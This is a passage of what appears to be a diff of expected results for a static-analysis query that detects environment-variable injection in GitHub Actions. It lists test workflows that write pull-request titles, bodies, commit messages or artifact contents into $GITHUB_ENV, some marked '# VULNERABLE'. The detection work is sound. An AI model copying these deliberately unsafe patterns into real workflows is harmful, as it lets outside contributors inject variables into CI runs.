$GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | -| .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | .github/workflows/test4.yml:29:19:29:56 | github.event.pull_request.title | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | -| .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | .github/workflows/test4.yml:43:19:43:56 | github.event.pull_request.title | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | -| .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | .github/workflows/test4.yml:57:27:57:64 | github.event.pull_request.title | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | -| .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | .github/workflows/test4.yml:60:19:60:56 | github.event.pull_request.title | .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | -| .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | .github/workflows/test5.yml:10:9:30:6 | Uses Step | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | -| .github/workflows/test6.yml:12:14:14:46 | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | .github/workflows/test6.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test6.yml:12:14:14:46 | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test6.yml:12:14:14:46 | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | -| .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | .github/workflows/test6.yml:16:19:16:56 | github.event.pull_request.title | .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | -| .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | .github/workflows/test6.yml:21:19:21:56 | github.event.pull_request.title | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | -| .github/workflows/test7.yml:16:9:24:35 | Uses Step | .github/workflows/test7.yml:9:9:16:6 | Uses Step | .github/workflows/test7.yml:16:9:24:35 | Uses Step | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test7.yml:16:9:24:35 | Uses Step | Uses Step | -| .github/workflows/test8.yml:31:14:33:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | .github/workflows/test8.yml:24:9:30:6 | Uses Step | .github/workflows/test8.yml:31:14:33:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test8.yml:31:14:33:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | -| .github/workflows/test8.yml:35:14:36:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | .github/workflows/test8.yml:24:9:30:6 | Uses Step | .github/workflows/test8.yml:35:14:36:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test8.yml:35:14:36:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | -| .github/workflows/test8.yml:38:14:39:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | .github/workflows/test8.yml:24:9:30:6 | Uses Step | .github/workflows/test8.yml:38:14:39:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test8.yml:38:14:39:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | -| .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | .github/workflows/test9.yml:19:9:27:6 | Uses Step | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | -| .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | .github/workflows/test10.yml:20:9:26:6 | Uses Step | .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | cat foo/.github/java-config.env >> $GITHUB_ENV | -| .github/workflows/test11.yml:23:14:28:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | .github/workflows/test11.yml:15:9:21:6 | Uses Step | .github/workflows/test11.yml:23:14:28:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test11.yml:23:14:28:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | -| .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | -| .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | -| .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:55:9:61:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | -| .github/workflows/test13.yml:18:14:20:65 | COMMIT_MESSAGE=$(git log --format=%s)\necho "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV\n | .github/workflows/test13.yml:18:14:20:65 | COMMIT_MESSAGE=$(git log --format=%s)\necho "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV\n | .github/workflows/test13.yml:18:14:20:65 | COMMIT_MESSAGE=$(git log --format=%s)\necho "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test13.yml:18:14:20:65 | COMMIT_MESSAGE=$(git log --format=%s)\necho "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV\n | COMMIT_MESSAGE=$(git log --format=%s)\necho "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV\n | -| .github/workflows/test13.yml:22:14:23:70 | echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV\n | .github/workflows/test13.yml:22:14:23:70 | echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV\n | .github/workflows/test13.yml:22:14:23:70 | echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test13.yml:22:14:23:70 | echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV\n | echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV\n | -| .github/workflows/test14.yml:14:14:15:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:14:14:15:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:14:14:15:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test14.yml:14:14:15:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | -| .github/workflows/test14.yml:24:14:26:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:24:14:26:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:24:14:26:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test14.yml:24:14:26:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | -| .github/workflows/test15.yml:11:14:12:98 | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:11:14:12:98 | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:11:14:12:98 | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test15.yml:11:14:12:98 | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | -| .github/workflows/test15.yml:18:14:20:48 | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:18:14:20:48 | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:18:14:20:48 | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test15.yml:18:14:20:48 | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | -| .github/workflows/test16.yml:15:14:17:63 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | .github/workflows/test16.yml:10:9:15:6 | Uses Step | .github/workflows/test16.yml:15:14:17:63 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test16.yml:15:14:17:63 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | -| .github/workflows/test16.yml:18:14:20:77 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | .github/workflows/test16.yml:10:9:15:6 | Uses Step | .github/workflows/test16.yml:18:14:20:77 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test16.yml:18:14:20:77 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | +| .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | .github/workflows/artifactpoisoning51.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | .github/workflows/artifactpoisoning52.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/artifactpoisoning53.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | .github/workflows/test2.yml:12:9:41:6 | Uses Step | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | .github/workflows/test2.yml:3:3:3:14 | workflow_run | workflow_run | +| .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | .github/workflows/test3.yml:13:7:20:4 | Uses Step | .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | .github/workflows/test3.yml:3:3:3:14 | workflow_run | workflow_run | +| .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | .github/workflows/test4.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | .github/workflows/test4.yml:15:19:15:56 | github.event.pull_request.title | .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | .github/workflows/test4.yml:19:19:19:56 | github.event.pull_request.title | .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | .github/workflows/test4.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | .github/workflows/test4.yml:29:19:29:56 | github.event.pull_request.title | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | .github/workflows/test4.yml:43:19:43:56 | github.event.pull_request.title | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | .github/workflows/test4.yml:57:27:57:64 | github.event.pull_request.title | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | 